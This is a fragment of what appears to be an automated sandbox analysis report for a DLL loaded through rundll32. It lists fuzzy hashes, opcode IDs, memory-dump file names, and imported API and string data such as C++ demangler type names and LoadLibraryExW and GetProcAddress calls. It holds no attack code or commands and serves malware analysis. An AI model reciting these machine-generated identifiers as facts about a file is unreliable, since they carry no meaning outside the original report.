                                                                                                                                                                                                                            • Opcode ID: 1964baec96956f892e6203e76eab5b4969056fd1643145ef955a9e88754c99ec
                                                                                                                                                                                                                            • Instruction ID: 88f57e57f347a8418113958807297c111dc03e18e3fb2e44c83c4004166c2925
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1964baec96956f892e6203e76eab5b4969056fd1643145ef955a9e88754c99ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1931C872204B84C6DBA18F29E0407AD7BA0F78DB8CF248125EB8C4B751CF36C596CB05
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a017be94b9d068a61e02d12c2cc4324c50247f8930cb8fa5ccd183391be106f2
                                                                                                                                                                                                                            • Instruction ID: df90e0fd50cd5d79230831a598737eadb20a6df069e4a62da7289230863c360c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a017be94b9d068a61e02d12c2cc4324c50247f8930cb8fa5ccd183391be106f2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B318272204A9486EB658F29E0403BD77A0F79DB8CF258115EB8C4B761DF36C596DB04
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 0da7e9209479ef0cb63439bf8a2a90352237857cb9c3176e763d75088f004d9a
                                                                                                                                                                                                                            • Instruction ID: db2f8203021b2f7f68f8e77b5c8ae95fefbc7fb82e60ca50742b629a8a6c953c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0da7e9209479ef0cb63439bf8a2a90352237857cb9c3176e763d75088f004d9a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33315E72204B88C6EBA18F29E0803AD77A4F79DB8CF648126EB4D4B751DF36C596C704
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5f439ca86a7326d61d939cae9c704612729db203c6f751910fb396272f7d67cf
                                                                                                                                                                                                                            • Instruction ID: b25c6896c8672aa0923261d7f9bd5283857fe95a8bc3f62d983be6ae4e7c87be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f439ca86a7326d61d939cae9c704612729db203c6f751910fb396272f7d67cf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA316F72204B88C6EB659F29E4503AD7BA0E39DF8CF258126EB4C4B751DF36C596CB04
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 0d4d6af22ca999d21a700d3555551ee3f82a26e003b7e75654d69506ed44b59d
                                                                                                                                                                                                                            • Instruction ID: 77d346011149316ac04a5f4697daabb2f9c63c20d0fdd9667b8ae56fa03a0746
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d4d6af22ca999d21a700d3555551ee3f82a26e003b7e75654d69506ed44b59d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2317172205B8486EB618F29D4407AD77A0F39DF8CF258125EB8D4B751CF36C596CB04
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e19daeb74bf998052274caa8c3fece16ab216064d37a3e4ceadee2411425eee4
                                                                                                                                                                                                                            • Instruction ID: 5ae4c679862ac4b5d53e18a49174412fc11ab915ff4b52d9b5f8e02d2e733bf6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e19daeb74bf998052274caa8c3fece16ab216064d37a3e4ceadee2411425eee4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1431A472204A88C6DB618F29D0403AD77A0F79DF8CF258125EB4C4B761DF36C596C704
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c133b63652da1cf420c36a20650b5ec01119e36efb72f334426be63db447dc76
                                                                                                                                                                                                                            • Instruction ID: 293a194a163537fc14de887b3f2b69d9f7e604321f784b6d35d21f95387c56b7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c133b63652da1cf420c36a20650b5ec01119e36efb72f334426be63db447dc76
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93319172604A88C6EB658F29D0403AD77A0F78DB8CF65812AEB8C4B751CF36C156C704
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f03f402daf764cb1523d67440daaa0efa083cfb75c9a5114f08d9bd7f9b10615
                                                                                                                                                                                                                            • Instruction ID: f5b93211fe77b29487fa4fd257d5fde96400bce1abed37a72afd91fb1e027c2e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f03f402daf764cb1523d67440daaa0efa083cfb75c9a5114f08d9bd7f9b10615
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28318172204A48C6DB618F29D04039D7BA0F39DB8CF248129EB4D4B751CF36C696CB04
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 77b783239df9655da23e022cacfdefe35c78de26ffe6e70fc2e8dc86fced0d4d
                                                                                                                                                                                                                            • Instruction ID: 194b00cc888e2e2f76d18caba169315b46a1a6f577439443e2a011904a615860
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77b783239df9655da23e022cacfdefe35c78de26ffe6e70fc2e8dc86fced0d4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24318F72204B8886EB618F29D0807AD7BA1F38DB8CF258129EB8D4B751CF36C197C704
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b73871e068712f36eee8871fd14f195e2b24532075d4a97a50186b990cf6f83a
                                                                                                                                                                                                                            • Instruction ID: 591a8b1ba5a30be0745f61d02a2f059f1082fcfd71fc81c5500a2eb06f863d3f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b73871e068712f36eee8871fd14f195e2b24532075d4a97a50186b990cf6f83a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88317372214B44C6EB668F29D0807AD77A0F79DB8CF258125EB4C4B751DF36C596C704
Memory Dump Source
• Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                            • API String ID: 2943138195-1482988683
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                            • String ID: `anonymous namespace'
                                                                                                                                                                                                                            • API String ID: 3863519203-3062148218
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::$Name::operator+swprintf
                                                                                                                                                                                                                            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                            • API String ID: 130963256-2441609178
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Replicator::operator[]
                                                                                                                                                                                                                            • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                            • API String ID: 3676697650-3207858774
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                            • API String ID: 2943138195-1464470183
                                                                                                                                                                                                                            • Opcode ID: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                            • Instruction ID: 86b2220616b80be68583d285cd14afb8824f7222dcd2462d23f21e207e41fe12
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90514F32610F58C9FB92CB64E8907EC37B2B7183C9FA08015EA895BA98DF35C659C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$0$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                            • Opcode ID: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                            • Instruction ID: 634aa9d0042bbda353e8cc45d4c8daf7f92220045ba3d69c75e7207222ffe171
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C412B032A0418D86FBA76E15F0443EB77A1F788B94F96C116F68647AC4DF78C688CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$0$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                            • Opcode ID: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                            • Instruction ID: 93a9ff39d45d2419c6a7fc755833649a49288bc20d1d0bfe1c27cd3576f2de20
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E612E331A042DA86FBA39B14D0543EB7791F35ABD4F9AC312F696476C4DF38C6888B10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                            • API String ID: 2943138195-2239912363
                                                                                                                                                                                                                            • Opcode ID: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                            • Instruction ID: 11c260e0c16152af3f3440f9639a3bccbf9e6650033c1e5fc3f0bfcfe7c7928e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30513872B14F5898FB928B60D8803ED77B0B70C788F548125EE5923B96DF788389C710
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                            • Opcode ID: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                            • Instruction ID: 3b4b050498cdcb5f336cd356739b46ea81abb083d02af334d156d32d0928b2a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B12A27160438A86FBA39B14E0447EA7762F3587D4FF4C115F6D246AC6DF39CA888B05
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482EB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482F7
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-537541572
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: {for
                                                                                                                                                                                                                            • API String ID: 2943138195-864106941
                                                                                                                                                                                                                            • Opcode ID: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                            • Instruction ID: 495a72a0baf00997086ff0ea6129483d1001404d3758be8f7ad89a7954a2554b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9513A72605B88A9FB92DF68D4803EC77A1E349788F84D015FA485BB99DF78C799C340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::
                                                                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                                                                            • API String ID: 1333004437-2891890143
                                                                                                                                                                                                                            • Opcode ID: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                            • Instruction ID: 034e1c8f7962a666fb3fc1dfd84da393ef72e1dbc0cb733e50f71f00acf91dbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B331C372604F8C85EBA2DF25A8503EA6351B74EBC5F54C216FA9A4B791DF2CC3498340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9F1
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9FF
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA29
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA97
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FAA3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
